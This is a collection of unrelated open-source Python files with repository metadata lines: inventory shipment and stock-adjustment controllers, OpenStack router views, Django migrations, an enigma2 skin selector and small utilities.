    for track_item in track_rows:
        row=Storage(track_item)
        s3.inv_track_item_onaccept(Storage(vars=Storage(id=row.id),
                                           record = row,
                                           )
                                   )
    session.confirmation = T("Shipment Items Received")
    redirect(URL(c = "inv",
                 f = "recv",
                 args = [recv_id]))
# -----------------------------------------------------------------------------
def recv_cancel():
    """
        Cancel a Received Shipment

        Removes the received quantities from the site's stock, resets the
        track items to In Transit, rolls back quantity_fulfil on any linked
        request items, and finally sets the inv_recv to CANCEL and the
        originating inv_send (if any) back to SENT so the sender can cancel
        it to recover the stock.

        @todo what to do if the quantity cancelled doesn't exist?
    """
    try:
        recv_id = request.args[0]
    except:
        redirect(URL(f="recv"))
    rtable = s3db.inv_recv
    stable = s3db.inv_send
    tracktable = s3db.inv_track_item
    inv_item_table = s3db.inv_inv_item
    ritable = s3db.req_req_item
    siptable = s3db.supply_item_pack
    if not auth.s3_has_permission("delete",
                                  rtable,
                                  record_id=recv_id):
        session.error = T("You do not have permission to cancel this received shipment.")
    recv_record = rtable[recv_id]
    if recv_record.status != eden.inv.inv_ship_status["RECEIVED"]:
        session.error = T("This shipment has not been received - it has NOT been canceled because can still be edited.")
    if session.error:
        redirect(URL(c = "inv",
                     f = "recv",
                     args = [recv_id]))
    # Go through each item in the shipment remove them from the site store
    # and put them back in the track item record
    query = (tracktable.recv_id == recv_id) & \
            (tracktable.deleted == False)
    recv_items = db(query).select()
    send_id = None
    for recv_item in recv_items:
        inv_item_id = recv_item.recv_inv_item_id
        # Subtract the received quantity from the stock item
        # (field - value is evaluated server-side as an SQL expression)
        # This assumes that the inv_item has the quantity
        quantity = inv_item_table.quantity - recv_item.recv_quantity
        db(inv_item_table.id == inv_item_id).update(quantity = quantity)
        # @todo potential problem in that the send id should be the same for all track items but is not explicitly checked
        if send_id == None and recv_item.send_id != None:
            send_id = recv_item.send_id
    if recv_items:
        # Reset all track items for this shipment to In Transit.
        # (Hoisted out of the loop above: the identical update was being
        # executed redundantly on every iteration.)
        db(tracktable.recv_id == recv_id).update(status = 2) # In transit
    track_rows = db(tracktable.recv_id == recv_id).select()
    for track_item in track_rows:
        # if this is linked to a request
        # then remove these items from the quantity in fulfil
        if track_item.req_item_id:
            req_id = track_item.req_item_id
            req_item = ritable[req_id]
            req_quantity = req_item.quantity_fulfil
            # Convert between the request's pack and the tracked pack
            req_pack_quantity = siptable[req_item.item_pack_id].quantity
            track_pack_quantity = siptable[track_item.item_pack_id].quantity
            quantity_fulfil = s3db.supply_item_add(req_quantity,
                                                   req_pack_quantity,
                                                   - track_item.recv_quantity,
                                                   track_pack_quantity
                                                   )
            db(ritable.id == req_id).update(quantity_fulfil = quantity_fulfil)
            s3db.req_update_status(req_id)
    # Now set the recv record to cancelled and the send record to sent
    rtable[recv_id] = dict(date = request.utcnow,
                           status = eden.inv.inv_ship_status["CANCEL"],
                           owned_by_user = None,
                           owned_by_group = ADMIN)
    if send_id != None:
        # The sent record is now set back to SENT the warehouse can now cancel
        # this record to get the stock back into their warehouse.
        # IMPORTANT reports need to locate this record otherwise it can be
        # a mechanism to circumvent the auditing of stock
        stable[send_id] = dict(date = request.utcnow,
                               status = eden.inv.inv_ship_status["SENT"],
                               owned_by_user = None,
                               owned_by_group = ADMIN)
    redirect(URL(c = "inv",
                 f = "recv",
                 args = [recv_id]))
# =============================================================================
def track_item():
    """
        RESTful CRUD controller for inv_track_item (read-only)

        The optional ?report= get_var selects one of four pre-configured
        report views: "rel" (releases), "inc" (incoming supplies),
        "util" (utilization) or "exp" (expiration).
    """
    table = s3db.inv_track_item
    # Track items are never edited directly through this controller
    s3db.configure("inv_track_item",
                   create=False,
                   listadd=False,
                   insertable=False,
                   editable=False,
                   deletable=False,
                   )
    vars = request.get_vars
    if "report" in vars:
        if vars.report == "rel":
            # Summary of Releases: track items linked to a send record
            s3.crud_strings["inv_track_item"] = Storage(
                title_list = T("Summary of Releases"),
                subtitle_list = T("Summary Details"),
                title_search = T("Summary of Releases"),
                )
            s3db.configure("inv_track_item",
                           list_fields = ["id",
                                          #"send_id",
                                          #"req_item_id",
                                          (T("Date Released"), "send_id$date"),
                                          (T("Beneficiary"), "send_id$site_id"),
                                          (settings.get_inv_send_shortname(), "send_id$send_ref"),
                                          (settings.get_req_shortname(), "send_id$req_ref"),
                                          (T("Items/Description"), "item_id"),
                                          (T("Source"), "supply_org_id"),
                                          (T("Unit"), "item_pack_id"),
                                          (T("Quantity"), "quantity"),
                                          (T("Unit Cost"), "pack_value"),
                                          (T("Total Cost"), "total_value"),
                                          ],
                           orderby = "site_id",
                           sort = True
                           )
            s3.filter = (table.send_id != None)
        elif vars.report == "inc":
            # Summary of Incoming Supplies: track items linked to a recv record
            s3.crud_strings["inv_track_item"] = Storage(
                title_list = T("Summary of Incoming Supplies"),
                subtitle_list = T("Summary Details"),
                title_search = T("Summary of Incoming Supplies"),
                )
            s3db.configure("inv_track_item",
                           list_fields = ["id",
                                          (T("Date Received"), "recv_id$date"),
                                          (T("Received By"), "recv_id$recipient_id"),
                                          (settings.get_inv_send_shortname(), "recv_id$send_ref"),
                                          (settings.get_inv_recv_shortname(), "recv_id$recv_ref"),
                                          (settings.get_proc_shortname(), "recv_id$purchase_ref"),
                                          (T("Item/Description"), "item_id"),
                                          (T("Unit"), "item_pack_id"),
                                          (T("Quantity"), "quantity"),
                                          (T("Unit Cost"), "pack_value"),
                                          (T("Total Cost"), "total_value"),
                                          (T("Source"), "supply_org_id"),
                                          (T("Remarks"), "comments"),
                                          ],
                           orderby = "recipient_id",
                           )
            s3.filter = (table.recv_id != None)
        elif vars.report == "util":
            # Utilization Report: any track item with an item_id
            s3.crud_strings["inv_track_item"] = Storage(
                title_list = T("Utilization Report"),
                subtitle_list = T("Utilization Details"),
                title_search = T("Utilization Report"),
                )
            s3db.configure("inv_track_item",
                           list_fields = ["id",
                                          (T("Item/Description"), "item_id$name"),
                                          (T("Beneficiary"), "send_id$site_id"),
                                          (settings.get_inv_send_shortname(), "send_id$send_ref"),
                                          (settings.get_req_shortname(), "send_id$req_ref"),
                                          (T("Items/Description"), "item_id"),
                                          (T("Source"), "supply_org_id"),
                                          (T("Unit"), "item_pack_id"),
                                          (T("Quantity"), "quantity"),
                                          (T("Unit Cost"), "pack_value"),
                                          (T("Total Cost"), "total_value"),
                                          ]
                           )
            s3.filter = (table.item_id != None)
        elif vars.report == "exp":
            # Expiration Report: track items carrying an expiry date
            s3.crud_strings["inv_track_item"] = Storage(
                title_list = T("Expiration Report"),
                subtitle_list = T("Expiration Details"),
                title_search = T("Expiration Report"),
                )
            s3db.configure("inv_track_item",
                           list_fields = ["id",
                                          (T("Item/Description"), "item_id"),
                                          (T("Expiration Date"), "expiry_date"),
                                          (T("Source"), "supply_org_id"),
                                          (T("Unit"), "item_pack_id"),
                                          (T("Quantity"), "quantity"),
                                          (T("Unit Cost"), "pack_value"),
                                          (T("Total Cost"), "total_value"),
                                          ]
                           )
            s3.filter = (table.expiry_date != None)
    output = s3_rest_controller(rheader=s3db.inv_warehouse_rheader)
    return output
# =============================================================================
def adj():
    """
        RESTful CRUD controller for Stock Adjustments (inv_adj)

        Supports a "single item adjustment" shortcut: passing ?item=&site=
        get_vars creates an adjustment with one pre-populated adj_item and
        redirects straight to its update form.
    """
    table = s3db.inv_adj
    # Limit site_id to sites the user has permissions for
    error_msg = T("You do not have permission to adjust the stock level in this warehouse.")
    auth.permitted_facilities(table=table, error_msg=error_msg)
    def prep(r):
        if r.interactive:
            if r.component:
                if r.component_id:
                    aitable = s3db.inv_adj_item
                    # status 0 = adjustment still open: reason is editable
                    if r.record.status == 0:
                        aitable.reason.writable = True
                    record = aitable[r.component_id]
                    if record.inv_item_id:
                        # Item already selected from stock: lock the item fields
                        aitable.item_id.writable = False
                        aitable.item_id.comment = None
                        aitable.item_pack_id.writable = False
            else:
                # if an adjustment has been selected and it has been completed
                # then make the fields read only
                if r.record and r.record.status:
                    table.adjuster_id.writable = False
                    table.site_id.writable = False
                    table.comments.writable = False
                else:
                    if "item" in request.vars and "site" in request.vars:
                        # create a adj record with a single adj_item record
                        adj_id = table.insert(adjuster_id = auth.s3_logged_in_person(),
                                              site_id = request.vars.site,
                                              adjustment_date = request.utcnow,
                                              status = 0,
                                              category = 1,
                                              comments = "Single item adjustment"
                                              )
                        inv_item_table = s3db.inv_inv_item
                        inv_item = inv_item_table[request.vars.item]
                        adjitemtable = s3db.inv_adj_item
                        # Seed the adj_item with the stock item's current values
                        adj_item_id = adjitemtable.insert(reason = 0,
                                                          adj_id = adj_id,
                                                          inv_item_id = inv_item.id, # original source inv_item
                                                          item_id = inv_item.item_id, # the supply item
                                                          item_pack_id = inv_item.item_pack_id,
                                                          old_quantity = inv_item.quantity,
                                                          currency = inv_item.currency,
                                                          old_status = inv_item.status,
                                                          new_status = inv_item.status,
                                                          old_pack_value = inv_item.pack_value,
                                                          new_pack_value = inv_item.pack_value,
                                                          expiry_date = inv_item.expiry_date,
                                                          bin = inv_item.bin,
                                                          old_owner_org_id = inv_item.owner_org_id,
                                                          new_owner_org_id = inv_item.owner_org_id,
                                                          )
                        redirect(URL(c = "inv",
                                     f = "adj",
                                     args = [adj_id,
                                             "adj_item",
                                             adj_item_id,
                                             "update"]))
                    else:
                        table.comments.default = "Complete Stock Adjustment"
                        if "site" in request.vars:
                            table.site_id.writable = True
                            table.site_id.default = request.vars.site
        return True
    s3.prep = prep
    def postp(r, output):
        if r.interactive:
            s3_action_buttons(r, deletable=False)
        return output
    s3.postp = postp
    # Completed adjustments: lock the adj_item tab
    if len(request.args) > 1 and request.args[1] == "adj_item" and table[request.args[0]].status:
        # remove CRUD generated buttons in the tabs
        s3db.configure("inv_adj_item",
                       create=False,
                       listadd=False,
                       editable=False,
                       deletable=False,
                       )
    output = s3_rest_controller(rheader=s3db.inv_adj_rheader)
    return output
# -----------------------------------------------------------------------------
def adj_close():
    """
        Close (complete) a Stock Adjustment

        Applies each adj_item's new values to the site's stock - creating
        a new inv_inv_item where none was linked - then marks the
        adjustment complete and redirects to the site's inventory.
    """
    try:
        adj_id = request.args[0]
    except:
        redirect(URL(f="adj"))
    atable = s3db.inv_adj
    aitable = s3db.inv_adj_item
    inv_item_table = s3db.inv_inv_item
    # Limit site_id to sites the user has permissions for
    error_msg = T("You do not have permission to adjust the stock level in this warehouse.")
    auth.permitted_facilities(table=atable, error_msg=error_msg)
    adj_rec = atable[adj_id]
    # status 0 = still open; anything else has already been closed
    if adj_rec.status != 0:
        session.error = T("This adjustment has already been closed.")
    if session.error:
        redirect(URL(c = "inv",
                     f = "adj",
                     args = [adj_id]))
    # Go through all the adj_items
    query = (aitable.adj_id == adj_id) & \
            (aitable.deleted == False)
    adj_items = db(query).select()
    for adj_item in adj_items:
        if adj_item.inv_item_id == None:
            # Create a new stock item
            # NOTE(review): pack_value is taken from old_pack_value on both
            # the create and update paths - new_pack_value is never applied;
            # confirm this is intended
            inv_item_id = inv_item_table.insert(site_id = adj_rec.site_id,
                                                item_id = adj_item.item_id,
                                                item_pack_id = adj_item.item_pack_id,
                                                currency = adj_item.currency,
                                                bin = adj_item.bin,
                                                pack_value = adj_item.old_pack_value,
                                                expiry_date = adj_item.expiry_date,
                                                quantity = adj_item.new_quantity,
                                                owner_org_id = adj_item.old_owner_org_id,
                                                )
            # Add the inventory item id to the adjustment record
            db(aitable.id == adj_item.id).update(inv_item_id = inv_item_id)
        elif adj_item.new_quantity is not None:
            # Update the existing stock item
            db(inv_item_table.id == adj_item.inv_item_id).update(item_pack_id = adj_item.item_pack_id,
                                                                 bin = adj_item.bin,
                                                                 pack_value = adj_item.old_pack_value,
                                                                 expiry_date = adj_item.expiry_date,
                                                                 quantity = adj_item.new_quantity,
                                                                 owner_org_id = adj_item.new_owner_org_id,
                                                                 status = adj_item.new_status,
                                                                 )
    # Change the status of the adj record to Complete
    db(atable.id == adj_id).update(status=1)
    # Go to the Inventory of the Site which has adjusted these items
    (prefix, resourcename, id) = s3db.get_instance(s3db.org_site,
                                                   adj_rec.site_id)
    url = URL(c = prefix,
              f = resourcename,
              args = [id, "inv_item"])
    redirect(url)
# =============================================================================
def recv_item_json():
    """
        JSON lookup for a Request Item: all shipments RECEIVED against it,
        prefixed with a header entry for the client-side display
    """
    rtable = s3db.inv_recv
    stable = s3db.org_site
    ittable = s3db.inv_track_item
    # Show just the date part of the datetime
    rtable.date.represent = lambda dt: dt[:10]
    filters = (ittable.req_item_id == request.args[0]) & \
              (rtable.id == ittable.recv_id) & \
              (rtable.site_id == stable.id) & \
              (rtable.status == eden.inv.inv_ship_status["RECEIVED"]) & \
              (ittable.deleted == False )
    rows = db(filters).select(rtable.id,
                              rtable.date,
                              stable.name,
                              ittable.quantity)
    # Prepend a header entry, splicing in the record list minus its
    # opening bracket so the result is a single JSON array
    header = json.dumps(dict(id = str(T("Received")),
                             quantity = "#"))
    json_str = "[%s,%s" % (header, rows.json()[1:])
    response.headers["Content-Type"] = "application/json"
    return json_str
# -----------------------------------------------------------------------------
def send_item_json():
    """
        Lookup the shipments of a requested item & return as JSON.

        Expects the inv_track_item's req_item_id in request.args[0].
        Returns a JSON list whose first element is a header row
        (label + "#" placeholder for the quantity column) followed by one
        row per sent (or already received) shipment item
        (send id, date, site name, quantity).
    """
    stable = s3db.org_site
    istable = s3db.inv_send
    ittable = s3db.inv_track_item
    # Render dates as plain YYYY-MM-DD
    istable.date.represent = lambda dt: dt[:10]
    # Shipments which have been sent, including those already received
    query = (ittable.req_item_id == request.args[0]) & \
            (istable.id == ittable.send_id) & \
            (istable.site_id == stable.id) & \
            ((istable.status == eden.inv.inv_ship_status["SENT"]) | \
             (istable.status == eden.inv.inv_ship_status["RECEIVED"])) & \
            (ittable.deleted == False)
    records = db(query).select(istable.id,
                               istable.date,
                               stable.name,
                               ittable.quantity)
    # Splice the header dict into the rows' JSON: records.json() starts
    # with "[", which is stripped here and re-added by the format string
    json_str = "[%s,%s" % ( json.dumps(dict(id = str(T("Sent")),
                                            quantity = "#"
                                            )) ,
                            records.json()[1:])
    response.headers["Content-Type"] = "application/json"
    return json_str
# -----------------------------------------------------------------------------
def kit():
    """ RESTful CRUD controller for Item Kits """
    return s3_rest_controller()
# -----------------------------------------------------------------------------
def facility():
    """ RESTful CRUD controller for Facilities (org_facility resource) """
    return s3_rest_controller("org", rheader = s3db.org_facility_rheader)
# -----------------------------------------------------------------------------
def incoming():
    """ Incoming Shipments """
    # Delegates to inv_incoming(), which is defined in the Model so that it
    # can be used from multiple controllers with unified menus
    return inv_incoming()
# -----------------------------------------------------------------------------
def req_match():
    """ Match Requests - delegates to s3db.req_match() """
    return s3db.req_match()
# END =========================================================================
| ashwyn/eden-message_parser | controllers/inv.py | Python | mit | 72,247 |
from datetime import datetime
from pytz import timezone
FORMAT = "%Y-%m-%d %H%M"
TIME_ZONE = 'Europe/Paris'
def current_time_zone_info(tz=TIME_ZONE):
    """Return the current date and time in *tz* as a two-item list.

    The current time is formatted with FORMAT ("%Y-%m-%d %H%M") and split
    on whitespace, yielding ``[date, time]``, e.g. ``['2024-01-31', '1405']``.

    Args:
        tz: a pytz-compatible timezone name. Defaults to TIME_ZONE
            ('Europe/Paris') so existing zero-argument callers are
            unaffected.
    """
    current_time = datetime.now(timezone(tz)).strftime(FORMAT)
    return current_time.split()
| wearhacks/hackathon_hotline | hotline/common/time_zone.py | Python | mit | 242 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012, Nachi Ueno, NTT MCL, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Views for managing Neutron Routers.
"""
import logging
from django.core.urlresolvers import reverse_lazy
from django.utils.datastructures import SortedDict
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import tables
from openstack_dashboard import api
from openstack_dashboard.dashboards.project.routers.forms import CreateForm
from openstack_dashboard.dashboards.project.routers.ports.tables \
import PortsTable
from openstack_dashboard.dashboards.project.routers.tables import RoutersTable
LOG = logging.getLogger(__name__)
class IndexView(tables.DataTableView):
    """Table view listing the current tenant's Neutron routers."""
    table_class = RoutersTable
    template_name = 'project/routers/index.html'

    def _get_routers(self, search_opts=None):
        """Return the tenant's routers with gateway network names resolved.

        Failures are reported via horizon's exceptions.handle and result in
        an empty table rather than an error page.
        """
        try:
            tenant_id = self.request.user.tenant_id
            routers = api.neutron.router_list(self.request,
                                              tenant_id=tenant_id,
                                              search_opts=search_opts)
        except Exception:
            # Was a bare "except:"; narrowed so SystemExit and
            # KeyboardInterrupt are no longer swallowed.
            routers = []
            exceptions.handle(self.request,
                              _('Unable to retrieve router list.'))
        ext_net_dict = self._list_external_networks()
        for r in routers:
            r.set_id_as_name_if_empty()
            self._set_external_network(r, ext_net_dict)
        return routers

    def get_data(self):
        return self._get_routers()

    def _list_external_networks(self):
        """Return a mapping of external network id -> display name.

        Returns an empty dict (after reporting the error) on failure.
        """
        try:
            search_opts = {'router:external': True}
            ext_nets = api.neutron.network_list(self.request,
                                                **search_opts)
            for ext_net in ext_nets:
                ext_net.set_id_as_name_if_empty()
            ext_net_dict = SortedDict((n['id'], n.name) for n in ext_nets)
        except Exception as e:
            msg = _('Unable to retrieve a list of external networks "%s".') % e
            exceptions.handle(self.request, msg)
            ext_net_dict = {}
        return ext_net_dict

    def _set_external_network(self, router, ext_net_dict):
        """Attach the gateway network's display name to *router* in place."""
        gateway_info = router.external_gateway_info
        if gateway_info:
            ext_net_id = gateway_info['network_id']
            if ext_net_id in ext_net_dict:
                gateway_info['network'] = ext_net_dict[ext_net_id]
            else:
                msg = _('External network "%s" not found.') % (ext_net_id)
                exceptions.handle(self.request, msg)
class DetailView(tables.MultiTableView):
    """Detail view for a single router: summary plus its interface ports."""
    table_classes = (PortsTable, )
    template_name = 'project/routers/detail.html'
    failure_url = reverse_lazy('horizon:project:routers:index')

    def _get_data(self):
        """Fetch (and cache on self._router) the router named in the URL.

        On lookup failure the user is redirected back to the index view.
        The external gateway's network id is resolved to a human-readable
        name when possible, falling back to the raw id.
        """
        if not hasattr(self, "_router"):
            try:
                router_id = self.kwargs['router_id']
                router = api.neutron.router_get(self.request, router_id)
                router.set_id_as_name_if_empty(length=0)
            except Exception:
                # Was a bare "except:"; narrowed so SystemExit and
                # KeyboardInterrupt are no longer swallowed.
                msg = _('Unable to retrieve details for router "%s".') \
                    % (router_id)
                exceptions.handle(self.request, msg, redirect=self.failure_url)
            if router.external_gateway_info:
                ext_net_id = router.external_gateway_info['network_id']
                try:
                    ext_net = api.neutron.network_get(self.request, ext_net_id,
                                                      expand_subnet=False)
                    ext_net.set_id_as_name_if_empty(length=0)
                    router.external_gateway_info['network'] = ext_net.name
                except Exception:
                    # Fall back to displaying the raw network id.
                    msg = _('Unable to retrieve an external network "%s".') \
                        % (ext_net_id)
                    exceptions.handle(self.request, msg)
                    router.external_gateway_info['network'] = ext_net_id
            self._router = router
        return self._router

    def get_context_data(self, **kwargs):
        context = super(DetailView, self).get_context_data(**kwargs)
        context["router"] = self._get_data()
        return context

    def get_interfaces_data(self):
        """Return the router's ports for the interfaces table ([] on error)."""
        try:
            device_id = self.kwargs['router_id']
            ports = api.neutron.port_list(self.request,
                                          device_id=device_id)
        except Exception:
            # Was a bare "except:"; narrowed so SystemExit and
            # KeyboardInterrupt are no longer swallowed.
            ports = []
            msg = _('Port list can not be retrieved.')
            exceptions.handle(self.request, msg)
        for p in ports:
            p.set_id_as_name_if_empty()
        return ports
class CreateView(forms.ModalFormView):
    """Modal form view for creating a new router."""
    form_class = CreateForm
    template_name = 'project/routers/create.html'
    success_url = reverse_lazy("horizon:project:routers:index")
| tuskar/tuskar-ui | openstack_dashboard/dashboards/project/routers/views.py | Python | apache-2.0 | 5,466 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-05-22 23:51
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated migration: sets human-readable admin labels on
    # QuizActivity and makes QuizActivityItem.question deletion CASCADE
    # explicit (required since Django 1.9's mandatory on_delete).
    dependencies = [
        ('cs_questions', '0010_auto_20160522_2041'),
    ]
    operations = [
        migrations.AlterModelOptions(
            name='quizactivity',
            options={'verbose_name': 'quiz activity', 'verbose_name_plural': 'quiz activities'},
        ),
        migrations.AlterField(
            model_name='quizactivityitem',
            name='question',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='cs_questions.Question'),
        ),
    ]
| jonnatas/codeschool | src/cs_questions/migrations/old/0011_auto_20160522_2051.py | Python | gpl-3.0 | 738 |
# -*- coding: utf-8 -*-
from Screens.Screen import Screen
from Screens.Standby import TryQuitMainloop
from Screens.MessageBox import MessageBox
from Components.ActionMap import NumberActionMap
from Components.Pixmap import Pixmap
from Components.Sources.StaticText import StaticText
from Components.MenuList import MenuList
from Components.config import config, configfile
from Tools.Directories import resolveFilename, SCOPE_ACTIVE_SKIN
from enigma import eEnv, ePicLoad
import os
class SkinSelectorBase:
	"""Shared logic for the skin selection screens (list, preview, apply).

	Subclasses must provide: SKINXML / PICONSKINXML (skin file names),
	DEFAULTSKIN / PICONDEFAULTSKIN (display labels), root (skin search
	directory) and, in their __init__, self.config (the ConfigText entry
	the chosen skin path is persisted to).
	"""
	def __init__(self, session, args = None):
		self.setTitle(_("Skin Selector"))
		self.skinlist = []
		self.previewPath = ""
		# Offer the built-in default skin(s) when their XML exists in root
		if self.SKINXML and os.path.exists(os.path.join(self.root, self.SKINXML)):
			self.skinlist.append(self.DEFAULTSKIN)
		if self.PICONSKINXML and os.path.exists(os.path.join(self.root, self.PICONSKINXML)):
			self.skinlist.append(self.PICONDEFAULTSKIN)
		# Every subdirectory containing the skin XML counts as a skin.
		# NOTE(review): rebinding ``dirs = []`` does NOT prune os.walk's
		# recursion (that needs ``dirs[:] = []``), so nested directories
		# are still visited - confirm whether deep scanning is intended.
		for root, dirs, files in os.walk(self.root, followlinks=True):
			for subdir in dirs:
				dir = os.path.join(root,subdir)
				if os.path.exists(os.path.join(dir,self.SKINXML)):
					self.skinlist.append(subdir)
			dirs = []
		self["key_red"] = StaticText(_("Close"))
		self["key_green"] = StaticText(_("Save"))
		self["introduction"] = StaticText(_("Press OK to activate the selected skin."))
		self["SkinList"] = MenuList(self.skinlist)
		self["Preview"] = Pixmap()
		self.skinlist.sort()
		self["actions"] = NumberActionMap(["SetupActions", "DirectionActions", "TimerEditActions", "ColorActions"],
		{
			"ok": self.ok,
			"cancel": self.close,
			"red": self.close,
			"green": self.ok,
			"up": self.up,
			"down": self.down,
			"left": self.left,
			"right": self.right,
			"log": self.info,
		}, -1)
		# Async picture decoder; showPic is called when a preview is ready
		self.picload = ePicLoad()
		self.picload.PictureData.get().append(self.showPic)
		self.onLayoutFinish.append(self.layoutFinished)
	def showPic(self, picInfo=""):
		"""Callback from ePicLoad: blit the decoded preview into the widget."""
		ptr = self.picload.getData()
		if ptr is not None:
			self["Preview"].instance.setPixmap(ptr.__deref__())
			self["Preview"].show()
	def layoutFinished(self):
		"""Size the decoder, preselect the currently configured skin, preview it."""
		self.picload.setPara((self["Preview"].instance.size().width(), self["Preview"].instance.size().height(), 0, 0, 1, 1, "#00000000"))
		# config value is "<skinname>/<SKINXML>"; extract the skin name part
		tmp = self.config.value.find("/"+self.SKINXML)
		if tmp != -1:
			tmp = self.config.value[:tmp]
			idx = 0
			for skin in self.skinlist:
				if skin == tmp:
					break
				idx += 1
			if idx < len(self.skinlist):
				self["SkinList"].moveToIndex(idx)
		self.loadPreview()
	def ok(self):
		"""Resolve the selected skin to its XML path and offer a GUI restart."""
		if self["SkinList"].getCurrent() == self.DEFAULTSKIN:
			self.skinfile = ""
			self.skinfile = os.path.join(self.skinfile, self.SKINXML)
		elif self["SkinList"].getCurrent() == self.PICONDEFAULTSKIN:
			self.skinfile = ""
			self.skinfile = os.path.join(self.skinfile, self.PICONSKINXML)
		else:
			self.skinfile = self["SkinList"].getCurrent()
			self.skinfile = os.path.join(self.skinfile, self.SKINXML)
		print "Skinselector: Selected Skin: "+self.root+self.skinfile
		restartbox = self.session.openWithCallback(self.restartGUI,MessageBox,_("GUI needs a restart to apply a new skin\nDo you want to restart the GUI now?"), MessageBox.TYPE_YESNO)
		restartbox.setTitle(_("Restart GUI now?"))
	def up(self):
		self["SkinList"].up()
		self.loadPreview()
	def down(self):
		self["SkinList"].down()
		self.loadPreview()
	def left(self):
		self["SkinList"].pageUp()
		self.loadPreview()
	def right(self):
		self["SkinList"].pageDown()
		self.loadPreview()
	def info(self):
		aboutbox = self.session.open(MessageBox,_("Enigma2 skin selector"), MessageBox.TYPE_INFO)
		aboutbox.setTitle(_("About..."))
	def loadPreview(self):
		"""Decode the preview image of the selected skin (noprev.png fallback)."""
		if self["SkinList"].getCurrent() == self.DEFAULTSKIN:
			pngpath = "."
			pngpath = os.path.join(os.path.join(self.root, pngpath), "prev.png")
		elif self["SkinList"].getCurrent() == self.PICONDEFAULTSKIN:
			pngpath = "."
			pngpath = os.path.join(os.path.join(self.root, pngpath), "piconprev.png")
		else:
			pngpath = self["SkinList"].getCurrent()
			# NOTE(review): os.path.join on these str arguments should not
			# raise, so this bare try/except looks redundant - confirm.
			try:
				pngpath = os.path.join(os.path.join(self.root, pngpath), "prev.png")
			except:
				pass
		if not os.path.exists(pngpath):
			pngpath = resolveFilename(SCOPE_ACTIVE_SKIN, "noprev.png")
		# Only restart decoding when the selection actually changed
		if self.previewPath != pngpath:
			self.previewPath = pngpath
			self.picload.startDecode(self.previewPath)
	def restartGUI(self, answer):
		"""MessageBox callback: persist the chosen skin and restart enigma2."""
		if answer is True:
			if isinstance(self, LcdSkinSelector):
				config.skin.display_skin.value = self.skinfile
				config.skin.display_skin.save()
			else:
				config.skin.primary_skin.value = self.skinfile
				config.skin.primary_skin.save()
			self.session.open(TryQuitMainloop, 3)
class SkinSelector(Screen, SkinSelectorBase):
	"""Selector for the main GUI skin (persisted to config.skin.primary_skin)."""
	SKINXML = "skin.xml"
	DEFAULTSKIN = _("< Default >")
	PICONSKINXML = None
	PICONDEFAULTSKIN = None
	skinlist = []
	root = os.path.join(eEnv.resolve("${datadir}"),"enigma2")
	def __init__(self, session, args = None):
		Screen.__init__(self, session)
		# NOTE(review): SkinSelectorBase.__init__(self, session, args=None)
		# receives ``args`` in its ``session`` slot here; harmless because
		# the base never reads ``session`` - confirm before changing.
		SkinSelectorBase.__init__(self, args)
		Screen.setTitle(self, _("Skin setup"))
		self.skinName = "SkinSelector"
		self.config = config.skin.primary_skin
class LcdSkinSelector(Screen, SkinSelectorBase):
	"""Selector for the LCD/display skin (persisted to config.skin.display_skin),
	with an extra default variant that includes picons."""
	SKINXML = "skin_display.xml"
	DEFAULTSKIN = _("< Default >")
	PICONSKINXML = "skin_display_picon.xml"
	PICONDEFAULTSKIN = _("< Default with Picon >")
	skinlist = []
	root = os.path.join(eEnv.resolve("${datadir}"),"enigma2/display/")
	def __init__(self, session, args = None):
		Screen.__init__(self, session)
		# NOTE(review): ``args`` is passed in the base's ``session`` slot;
		# harmless because the base never reads ``session`` - confirm.
		SkinSelectorBase.__init__(self, args)
		Screen.setTitle(self, _("Skin setup"))
		self.skinName = "SkinSelector"
		self.config = config.skin.display_skin
| 0sc0d3r/enigma2 | lib/python/Screens/SkinSelector.py | Python | gpl-2.0 | 5,526 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2018-10-08 14:24
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: adds the optional pgp_key_fingerprint
    # field (nullable/blank CharField, max 64 chars) to UserProfile.
    dependencies = [
        ('mainapp', '0013_auto_20181005_1900'),
    ]
    operations = [
        migrations.AddField(
            model_name='userprofile',
            name='pgp_key_fingerprint',
            field=models.CharField(blank=True, max_length=64, null=True),
        ),
    ]
| meine-stadt-transparent/meine-stadt-transparent | mainapp/migrations/0014_userprofile_pgp_key_fingerprint.py | Python | mit | 490 |
# -*- coding: utf-8 -*-
from collections import Counter
from .design_pattern import singleton
@singleton()
class ListUtilsClass(object):
def most_common_inspect(self, list1):
new_list = []
for s1 in list1:
if not isinstance(s1, unicode):
s1 = str(s1).decode("UTF-8")
new_list.append(s1)
cc = Counter(new_list).most_common()
if len(cc) > 0:
max_len = len(max([c1[0] for c1 in cc], key=lambda x1: len(x1))) + 5
for c1 in cc:
print c1[0].ljust(max_len, ' '), ' : ', c1[1]
return cc
def uniq_seqs(self, seqs, uniq_lambda=None):
if uniq_lambda is None:
return list(set(seqs))
__uniq = set([])
__remove_idxes = []
for idx1, seq1 in enumerate(seqs[:]):
__id = uniq_lambda(seq1)
if __id in __uniq:
__remove_idxes.append(idx1)
else:
__uniq.add(__id)
new_seqs = []
for idx1, seq1 in enumerate(seqs[:]):
if idx1 not in __remove_idxes:
new_seqs.append(seq1)
seqs = new_seqs
return seqs
# Module-level singleton instance plus a convenience alias for the most
# commonly used helper.
ListUtils = ListUtilsClass()
uniq_seqs = ListUtils.uniq_seqs
| Luiti/etl_utils | etl_utils/list_utils.py | Python | mit | 1,250 |
# Glumol - An adventure game creator
# Copyright (C) 1998-2008 Sylvain Baubeau & Alexis Contour
# This file is part of Glumol.
# Glumol is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
# Glumol is distributed in the hope that it will be useful,
